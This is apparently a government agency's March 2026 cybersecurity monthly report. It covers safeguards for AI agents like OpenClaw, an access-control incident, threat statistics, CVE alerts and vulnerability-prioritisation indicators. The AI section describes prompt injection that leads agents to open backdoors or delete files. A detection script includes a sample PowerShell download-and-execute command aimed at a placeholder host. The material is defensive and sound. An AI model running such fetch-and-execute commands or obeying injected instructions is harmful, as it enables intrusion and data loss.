
Cybersecurity Monthly Report (March 2026)


1. Introduction of Cybersecurity
As AI evolves into a personal assistant, bringing efficiency and convenience, here are five essential cybersecurity safeguards you must know.

With the rapid development of artificial intelligence (AI) technology, "AI agents" with autonomous execution capabilities are gradually becoming the focus. The recently popular open-source project OpenClaw (commonly known as "Little Lobster" or "Lobster") exemplifies this trend. These tools can not only proactively complete tasks and connect to external services, but also operate operating systems, transforming AI from a simple auxiliary tool into an omnipotent digital manager.

Agent-type AI is smart and efficient, but it also needs to guard against its potential risks.
However, while enjoying the efficiency brought by AI, are you also leaving the system door open to hidden security threats? To understand how agent-based AI services are actually used, we interviewed users. The interviewees said that they usually use OpenClaw for non-sensitive matters such as uploading calendars, purchasing daily necessities and comparing prices, and found that the tool indeed brings great convenience. Information that used to be sorted out by hand can now be handled directly by the AI assistant from an instruction or a screenshot. Respondents even said that Lobster is very smart and learns very quickly, responding just like a real person. However, the interviewee was aware of its potential risks in the early stages of introduction. Unlike general generative AI, OpenClaw can independently connect to the Internet, change computer settings, and even install programs. The permissions and risks are extremely high, so the interviewee installed Lobster in a cloud virtual machine (VM), separated from the physical environment, and uses it only for handling general affairs.
In fact, this respondent's risk awareness is anything but paranoid. With this type of AI agent tool, the risks are comprehensive. Attackers do not need to hack into the host. As long as they bury malicious instructions in web pages or community messages that the AI will read, they may trick the AI into helping them open backdoors, delete files, or format them. Third-party "skill packages" available for download on the Internet may also contain malicious instructions or download links for malicious programs. In addition, after the AI has been operating for 24 hours, it will often trigger "memory compression" to save memory, which causes "amnesia": the AI forgets the safety rules originally set by the user.

Five security protection suggestions for introducing agent-based AI
In order to strike a balance between convenience and information security defense, the Information Security Administration recommends that everyone consider the following practices when introducing this new type of AI tool:
(1) Implement environment isolation: Install the AI agent in an independent environment. Do not install it on the main computer where secrets are stored or that is used for daily work. Instead, keep it on another brand-new, formatted computer, or in a dedicated virtual machine (VM) or container.

(2) Grant only "temporary access": Register an exclusive, independent account (including a dedicated email and social platform account) for the AI agent, and avoid giving the AI agent the accounts and passwords you use personally every day. If the AI agent must log in to external services, it is recommended to set up time-limited temporary authorization credentials. The permissions expire automatically when the time is up, which avoids account theft caused by neglected management later on.

(3) Set up a human "braking" mechanism: For high-risk operations (such as accessing certificates, sending emails, or executing system commands), manual review should be mandatory in the system settings, requiring manual confirmation by personnel before each execution can be released.

(4) Write safety rules into "long-term memory": Regularly review and back up the AI's long-term memory files. Be sure to write important security restrictions (for example, personnel consent is required before deleting emails) directly into the "core memory file" (for example: Lobster's MEMORY.md), so that the security rules are loaded every time the agent runs and the configured protections are not forgotten because of memory compression.

(5) Carefully check the skill package: Before installing any third-party skill expansion package, perform a complete security scan of its content description and program code. If you find any suspicious behavior in the content, such as requests to download unknown files or connect to unknown websites, stop the installation immediately and report it to the platform.
When using new types of software or services, everyone can keep one principle in mind: "If you cannot control a tool or determine that it avoids risk, use it with caution, and stay aware of security in everything you do." The powerful autonomous learning and operation capabilities of current agent-based AI can undoubtedly improve work efficiency, but only by properly planning the protection mechanism can we truly enjoy the digital convenience brought by AI with peace of mind.
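Recommendations (2) and (3) can be combined in one policy layer, shown here as an added example that is not part of the original report and is not OpenClaw's own API. The AgentGate class, the action names and the approver callback are hypothetical.

```python
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

# High-risk operation classes named in recommendation (3); the identifiers
# themselves are assumptions made for this example.
HIGH_RISK = {"access_certificate", "send_email", "run_system_command"}


@dataclass
class AgentGate:
    """Hypothetical policy layer between an AI agent and the tools it may call."""
    approver: Callable[[str, str], bool]   # returns True only after a person confirms
    grants: Dict[str, float] = field(default_factory=dict)  # service -> expiry time
    audit: List[Tuple[float, str, Optional[str], str]] = field(default_factory=list)

    def grant(self, service: str, ttl_seconds: float, now: Optional[float] = None) -> None:
        """Issue a temporary authorization that lapses without any clean-up step."""
        now = time.time() if now is None else now
        self.grants[service] = now + ttl_seconds

    def authorize(self, action: str, service: Optional[str] = None,
                  detail: str = "", now: Optional[float] = None) -> str:
        """Return 'allow' or 'deny:<reason>' and record the decision for review."""
        now = time.time() if now is None else now
        decision = "allow"
        if service is not None and now >= self.grants.get(service, 0.0):
            decision = "deny:no-valid-grant"      # credential missing or expired
        elif action in HIGH_RISK and self.approver(action, detail) is not True:
            decision = "deny:not-approved"        # fail closed on anything but True
        self.audit.append((now, action, service, decision))
        return decision


def console_approver(action: str, detail: str) -> bool:
    """Manual 'brake': a person must type 'yes' for each high-risk call."""
    return input(f"Agent requests {action} ({detail}). Type 'yes' to allow: ") == "yes"


if __name__ == "__main__":
    gate = AgentGate(approver=console_approver)
    gate.grant("mail", ttl_seconds=900)           # 15-minute credential
    print(gate.authorize("read_calendar", service="mail"))
    print(gate.authorize("send_email", service="mail", detail="1 recipient"))
```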

2. Recent Cybersecurity Incident Sharing
The permission control of the project system failed, and the independent network segment was not monitored and became a blind spot in information security.

The agency received external intelligence indicating that a project system within its jurisdiction had a Broken Access Control vulnerability, allowing unauthorized personnel to read, modify or delete project participant information. It was found that the system was a self-developed application. Because its authority verification mechanism was insufficient, and because the independent network used for the project was not included in the agency's information security monitoring scope, the information unit was unable to grasp system risks in real time. The agency has urgently cut off external connections and is clarifying the scope of the impact and carrying out repairs.

Lessons Learned
Organizations applying for independent networks for business or project needs may create blind spots in security monitoring and management if they fail to simultaneously implement the protection requirements of the organization's cybersecurity responsibility level. It is recommended that organizations incorporate independent networks and project systems into the overall cybersecurity governance framework and reduce overall protection weaknesses through regular reviews and institutionalized management. 

(1) When applying for dedicated network lines, all units should configure necessary protective measures (such as firewalls and intrusion detection) according to the agency's cybersecurity responsibility level requirements and include them in the agency's cybersecurity control (SOC) scope. Simultaneously, they should regularly review the network architecture and external connections to ensure all networks are under management.

(2) For self-developed or outsourced systems, cybersecurity audits should be incorporated into the development and deployment process, with particular emphasis on strengthening the design of access control mechanisms. After deployment, regular vulnerability scans or inspections should be conducted, and the status of patching should be continuously monitored.

(3) Regularly inventory external lines and network equipment to prevent unauthorized connections. Projects using dedicated networks should be included in internal audits and regular reviews to ensure their protective measures remain effective and comply with the agency's cybersecurity requirements.

3. Cybersecurity Trends
3.1 National Government Cybersecurity Threat Trends

Ex ante joint defense and monitoring
This month, a total of 73,093 cybersecurity joint defense intelligence items were collected from government agencies (an increase of 12,329 items). Among identifiable threat categories, information collection ranked first (49%), primarily involving the acquisition of information through techniques such as scanning, probing and social engineering. This was followed by intrusion attempts (24%), mainly involving attempts to access unauthorized hosts, and intrusion attacks (11%), most of which involved unauthorized system access or the acquisition of system or user privileges. The distribution of intelligence volume over the past year is shown in Figure 1.

Figure 1: Statistics of cybersecurity monitoring intelligence in joint defense

From Phishing Emails to Memory Execution: An Analysis of Stealth PowerShell Attacks 
Further analysis of joint defense intelligence reveals that hackers have recently been using social engineering emails to trick users into executing shortcut files, thereby triggering multi-stage PowerShell scripts. These scripts download malware from legitimate cloud services and execute it directly in memory. Because this fileless technique does not require files to be written to the hard drive, it reduces the chance of detection by antivirus software or cybersecurity devices. This intelligence has been provided to various organizations for joint defense monitoring, along with protection recommendations.
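One way to hunt for this chain in process-creation logs, as an added example that is not part of the original report: the script scores PowerShell command lines for the traits described above. The indicator weights, the threshold and the sample records are constructed for illustration, and the hosts use the reserved .example domain.

```python
import re

# (name, weight, pattern) for traits of the chain described above: a hidden,
# non-interactive PowerShell that fetches content and runs it without a file.
INDICATORS = [
    ("hidden_window", 1, re.compile(r"\s-w(in(dowstyle)?)?\s+h(idden)?\b", re.I)),
    ("encoded_command", 2, re.compile(r"\s-(e|ec|en|enc\w*)\s", re.I)),
    ("network_download", 2, re.compile(
        r"net\.webclient|downloadstring|downloaddata|invoke-webrequest|invoke-restmethod",
        re.I)),
    ("in_memory_exec", 2, re.compile(
        r"invoke-expression|\biex\b|reflection\.assembly\]::load|frombase64string", re.I)),
]
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Constructed process-creation records: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-placeholder>"),
    ("cmd.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('https://storage.example/stage2')\""),
    ("services.exe", "powershell.exe",
     "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1"),
    ("explorer.exe", "powershell.exe", "powershell.exe"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\a\\notes.txt"),
]


def _basename(image):
    """Reduce a full Windows path to its lower-case file name."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(parent, image, cmdline):
    """Return (score, indicator names) for one process-creation record."""
    if _basename(image) not in POWERSHELL_IMAGES:
        return 0, []
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(cmdline)]
    # A shortcut opened by the user runs under explorer.exe; count that only
    # when the command line is already suspicious, to spare interactive use.
    if hits and _basename(parent) == "explorer.exe":
        hits.append(("launched_from_desktop_shell", 1))
    return sum(w for _, w in hits), [n for n, _ in hits]


def triage(events, threshold=3):
    """Return the records whose score reaches the threshold, in input order."""
    flagged = []
    for index, (parent, image, cmdline) in enumerate(events):
        score, names = score_event(parent, image, cmdline)
        if score >= threshold:
            flagged.append({"index": index, "score": score, "indicators": names})
    return flagged
```

Because the payload never touches disk, the command line and script block logs are the main evidence, so the patterns should be tuned against the organization's own administrative scripts before alerting on them.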

In-process reporting and responding
This month, a total of 55 reported cybersecurity incidents were recorded, representing 67% of the volume from the same period last year. The majority of reported incidents were categorized as illegal intrusions, accounting for 65.45% of the total. Past cases primarily involved counterfeit communication software; however, recent observations suggest attackers have expanded to other types of software. Incidents stemming from "using/downloading applications/kits from unknown sources" accounted for 10.90% of all reported cases. Statistics for cybersecurity incident reports over the past year are illustrated in Figure 2.

Figure 2: Statistics of cybersecurity incident reports

3.2 Important Vulnerability Alerts

Alert Type: Vulnerability Alert

Category: Backup and Restore System
Description: Veeam Backup & Replication
Severity: Maximum CVSS 9.9
(CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21669, CVE-2026-21670, CVE-2026-21671, CVE-2026-21672, CVE-2026-21708)
  • Researchers have discovered eight high-risk security vulnerabilities in Veeam Backup & Replication, including Remote Code Execution (RCE) and local privilege escalation.
  • The most critical vulnerability could allow an authenticated attacker or a low-privilege user to execute arbitrary code remotely on the backup server.
  • A patch has been released; it is recommended to update as soon as possible. (References 1, References 2)

Category: Network Switch
Description: HPE Aruba Networking AOS-CX Switch
Severity: Maximum CVSS 9.8 (CVE-2026-23813, CVE-2026-23814)

Category: Identity Verification and Middleware
Description: Oracle Identity Manager and Oracle Web Services Manager
Severity: CVSS 9.8 (CVE-2026-21992)

Alert Type: Known Exploited Vulnerability

Category: Collaboration and Document Platform
Description: Microsoft Office SharePoint
Severity: CVSS 8.8 (CVE-2026-20963)

Category: Endpoint Management System
Description: Ivanti Endpoint Manager (EPM)
Severity: CVSS 8.6 (CVE-2026-1603)

Category: Web browser
Description: Chromium-based browser
Severity: CVSS 8.8 (CVE-2026-3909, CVE-2026-3910)

Alert Explanations:
Vulnerability Alert: Verified vulnerabilities that have not yet been widely exploited by attackers. It is recommended to arrange updates as soon as possible.
Known Exploited Vulnerability: Known instances of successful attacks exploiting the vulnerability. Immediate evaluation and patching are strongly recommended.

4. International Cybersecurity News 
CISA Confirms Active Exploitation of FileZen CVE-2026-25108 Vulnerability
(Source: The Hacker News)
CISA confirmed active exploitation of CVE-2026-25108 (CVSS: 8.7), a critical OS command injection vulnerability in Soliton Systems FileZen file transfer software. The vulnerability allows an authenticated user with general privileges to execute arbitrary OS commands via specially crafted HTTP requests, potentially leading to system compromise. The flaw affects FileZen versions 4.2.1 to 4.2.8 and 5.0.0 to 5.0.10. Soliton said that the issue is exploitable when the Antivirus Check Option is enabled and reported at least one exploitation incident. The company advised users to immediately upgrade to version 5.0.11 or later, and change all user passwords to mitigate risk. CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and recommended that Federal Civilian Executive Branch (FCEB) agencies apply fixes by March 17.

Someone has Publicly Leaked an Exploit Kit That can Hack Millions of iPhones
(Source: Tech Republic)
A new version of the DarkSword hacking toolkit was leaked and published on GitHub, enabling easy exploitation of iPhones and iPads running older iOS versions, especially iOS 18 or earlier. The toolkit's simplicity, consisting of HTML and JavaScript, means attackers with minimal technical expertise can deploy it rapidly. DarkSword allows attackers to read and exfiltrate forensically relevant files from an iPhone or iPad, including contacts, messages, call history and iOS keychain secrets, sending them to attacker-controlled servers. Apple told TechCrunch that it is aware of the exploit targeting devices running older and out-of-date operating systems and that it issued an emergency update on March 11 for devices unable to run recent versions of iOS. Apple also advised users to enable Lockdown Mode to mitigate risk.

5. Cybersecurity Announcements
To improve the effectiveness of vulnerability management in various agencies and prioritize the handling of key risks, our agency has compiled three international cybersecurity vulnerability assessment indicators (VANS) for reference.
(1) In view of rapidly growing information security threats and the practical needs of vulnerability management, and in order to help organizations manage vulnerabilities in information systems and related assets more effectively, our Information Security Vulnerability Notification System (VANS) now includes the following 3 internationally commonly used information security vulnerability assessment indicators. By using the indicators together, organizations can identify the key risks that need to be prioritized:

i. CVSS (Common Vulnerability Scoring System): the severity index of vulnerabilities, currently maintained by the international Forum of Incident Response and Security Teams (FIRST). This indicator quantifies the technical details of a vulnerability as a score ranging from 0.0 to 10.0 and divides it into severity levels: Critical (9.0~10.0), High (7.0~8.9), Medium (4.0~6.9), Low (0.1~3.9), and None (0.0).

ii. KEV (Known Exploited Vulnerabilities): refers to a list of known exploited security vulnerabilities, maintained by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). By evaluating the actual situation of vulnerability exploitation, it reminds agencies to prioritize vulnerabilities that have been exploited by hackers for network attacks to reduce major security risks.

iii. EPSS (Exploit Prediction Scoring System): an indicator that predicts the probability of a vulnerability being exploited, proposed by the international Forum of Incident Response and Security Teams (FIRST). This indicator uses a machine learning model to predict the possibility of a vulnerability being exploited by hackers in the next 30 days (presented on a scale of 0 to 1, representing a probability of 0% to 100%).

(2) Application example: Information security vulnerabilities that are CVSS 7.0 or above and marked as KEV receive resources first and can be patched or mitigated immediately; the EPSS ranking can then be used to further determine the processing sequence.

(3) The operation instructions for the above functions have been updated simultaneously in the VANS education and training textbook and posted on the VANS section of the official website of the National Information Security Research Institute at https://gov.tw/Q47. If you still have questions about system operation after reading the textbook, you can contact the technical customer service window at (02) 6631-6423 or email [email protected].
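The application example in item (2), written out as an added example that is not part of the original report or of VANS: findings that are CVSS 7.0 or above and in KEV come first, and EPSS orders each group. The CVE identifiers and scores are constructed placeholders; ranking a missing EPSS last and breaking ties by CVSS are assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Finding:
    cve: str                 # placeholder identifier, constructed for this example
    cvss: float              # 0.0 to 10.0
    kev: bool                # listed in CISA's KEV catalog
    epss: Optional[float]    # 0 to 1, or None when no score is available


def severity(cvss: float) -> str:
    """Map a CVSS score to the severity levels listed in item i."""
    if not 0.0 <= cvss <= 10.0:
        raise ValueError(f"CVSS out of range: {cvss}")
    if cvss == 0.0:
        return "None"
    for upper, label in ((3.9, "Low"), (6.9, "Medium"), (8.9, "High")):
        if cvss <= upper:
            return label
    return "Critical"


def is_urgent(f: Finding) -> bool:
    """Rule from item (2): CVSS 7.0 or above and marked as KEV."""
    return f.cvss >= 7.0 and f.kev


def prioritize(findings: List[Finding]) -> List[Finding]:
    """Urgent findings first; EPSS (highest first) orders each group."""
    for f in findings:
        severity(f.cvss)                              # validates the CVSS range
        if f.epss is not None and not 0.0 <= f.epss <= 1.0:
            raise ValueError(f"EPSS out of range for {f.cve}: {f.epss}")

    def key(f: Finding):
        epss = -1.0 if f.epss is None else f.epss     # assumption: unscored goes last
        return (not is_urgent(f), -epss, -f.cvss, f.cve)

    return sorted(findings, key=key)


# Constructed inventory; none of these values describe real vulnerabilities.
SAMPLE = [
    Finding("CVE-0000-0001", 9.8, False, 0.02),
    Finding("CVE-0000-0002", 8.8, True, 0.91),
    Finding("CVE-0000-0003", 7.5, True, None),
    Finding("CVE-0000-0004", 8.6, True, 0.35),
    Finding("CVE-0000-0005", 5.3, True, 0.60),
    Finding("CVE-0000-0006", 6.1, False, 0.01),
]

if __name__ == "__main__":
    for f in prioritize(SAMPLE):
        print(f.cve, severity(f.cvss), "KEV" if f.kev else "-", f.epss)
```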

6. Latest Cybersecurity Conferences and Events

Date: 6 May 2026 (Morning)
Event/Conference: CISO Executive Retreat
Participants: Second- and third-level agencies under the Executive Yuan, fourth-level agencies (institutions) under the Executive Yuan, administrative legal persons with an information security responsibility level of A, and all county and city governments

Date: 6 May 2026 (Afternoon)
Event/Conference: Friends of Cybersecurity
Participants: Information security professionals who are studying or working (such as elite class trainees, network attack and defense drill attackers, DEFCON CTF final team players, members of public associations, etc.)